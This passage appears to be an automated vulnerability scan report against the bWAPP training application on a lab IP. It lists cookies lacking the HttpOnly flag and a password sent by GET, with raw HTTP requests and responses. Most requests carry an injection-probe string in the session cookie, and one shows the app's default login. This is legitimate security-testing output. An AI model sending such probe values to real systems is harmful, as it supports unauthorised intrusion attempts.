    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 15303

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    </p>

    <form>

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="passphrase" name="passphrase" size="20" /></p>
    ...[SNIP]...
    12.2. http://192.168.52.147/bWAPP/xmli_1.php

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/xmli_1.php

    Issue detail

    The page contains a form with the following action URL, which is submitted using the GET method:
    • http://192.168.52.147/bWAPP/xmli_1.php
    The form contains the following password field:
    • password

    Request 1

    GET /bWAPP/xmli_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13136

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    </p>

    <form action="/bWAPP/xmli_1.php" method="GET">

    <p>
    ...[SNIP]...
    <br />
    <input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
    ...[SNIP]...
    13. Cookie without HttpOnly flag set

    There are 17 instances of this issue:

    Issue background

    If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure makes certain client-side attacks, such as cross-site scripting, slightly harder to exploit by preventing them from trivially capturing the cookie's value via an injected script.

    13.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_captcha_bypass.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_captcha_bypass.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:03:29 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=62da764a0b47ad430e1ea925a689d8ff; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.2. http://192.168.52.147/bWAPP/ba_forgotten.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_forgotten.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_forgotten.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:04:03 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=3b4e4cf6377de603fe619c550583d7e7; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.3. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:05:30 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=b10596778c7bdc2f4ea30a13577820e6; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.4. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_pwd_attacks_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:07:45 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=06717d1d763caebb3efff0a6abd5857d; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.5. http://192.168.52.147/bWAPP/ba_weak_pwd.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_weak_pwd.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/ba_weak_pwd.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:09:44 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=1fdf6353230d8257460cfa12ab3a2e7b; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.6. http://192.168.52.147/bWAPP/bof_1.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/bof_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:10:27 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=e61c4d2eefc050713fefe64fb2e7f9f1; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.7. http://192.168.52.147/bWAPP/bof_2.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/bof_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:12:52 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=7bb6a5d2d1a2f5bdf8e5830d3ff1941a; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.8. http://192.168.52.147/bWAPP/captcha_box.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/captcha_box.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/captcha_box.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_captcha_bypass.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:15:37 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=42316c2dfc7731a0d341e92b7b3d5547; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.9. http://192.168.52.147/bWAPP/clickjacking.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/clickjacking.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/clickjacking.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/http_verb_tampering.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:16:05 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=72a5689580d7fc97d4db155b943f4ea9; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.10. http://192.168.52.147/bWAPP/commandi.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/commandi.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/commandi.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ldap_connect.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:17:42 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=031799dbb1d163b05fb89ec702e444c5; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.11. http://192.168.52.147/bWAPP/login.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/login.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    POST /bWAPP/login.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/login.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Content-Length: 51
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
    Connection: close

    login=bee&password=bug&security_level=0&form=submit

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:27 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; path=/
    Set-Cookie: security_level=0; expires=Sat, 09-Mar-2019 02:52:27 GMT; path=/
    Location: portal.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.12. http://192.168.52.147/bWAPP/portal.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/portal.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/portal.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:52:17 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.13. http://192.168.52.147/bWAPP/sqli_1.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/sqli_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:08:00 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=65507f4c7c2b9a6bf7ced8122531c455; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.14. http://192.168.52.147/bWAPP/sqli_10-1.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/sqli_10-1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/sqli_10-1.php?title=555-555-0199@example.com HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/sqli_10-1.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:11:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=519feb3595bbd669e05d65c5bb7df381; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.15. http://192.168.52.147/bWAPP/xmli_1.php

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.52.147
    Path:   /bWAPP/xmli_1.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • PHPSESSID
    The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/xmli_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 03:15:02 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Set-Cookie: PHPSESSID=b4570c0b456cf209ada94dab54eb7626; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: login.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    13.16. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/insecure_crypt_storage_3.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • secret
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/insecure_crypt_storage_3.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/ssii.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:54:40 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Set-Cookie: secret=QW55IGJ1Z3M%2F; expires=Fri, 09-Mar-2018 03:54:40 GMT; path=/
    Connection: close
    Content-Type: text/html
    Content-Length: 12772

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    13.17. http://192.168.52.147/bWAPP/xss_stored_2.php

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/xss_stored_2.php

    Issue detail

    The following cookie was issued by the application and does not have the HttpOnly flag set:
    • movie_genre
    The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

    Request 1

    GET /bWAPP/xss_stored_2.php?genre=horror&form=like HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/xss_stored_2.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
